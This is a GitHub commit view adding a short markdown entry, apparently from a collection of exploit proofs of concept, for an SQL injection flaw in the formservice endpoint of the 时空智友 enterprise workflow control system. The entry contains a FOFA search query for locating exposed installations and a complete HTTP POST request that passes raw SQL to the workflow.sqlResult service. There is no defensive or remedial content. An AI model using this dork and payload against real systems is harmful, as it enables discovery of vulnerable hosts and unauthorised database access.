Create 时空智友企业流程化管控系统formservice存在SQL注入漏洞.md

This commit is contained in:
wy876 2024-04-19 22:18:26 +08:00 committed by GitHub
parent ae0bae164d
commit 813e381e8c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,22 @@
## 时空智友企业流程化管控系统formservice存在SQL注入漏洞
## fofa
```
body="企业流程化管控系统" && body="密码(Password):"
```
## poc
```
POST /formservice?service=workflow.sqlResult HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 50
{"params":{"a":"11"},"sql":"select @@version"}
```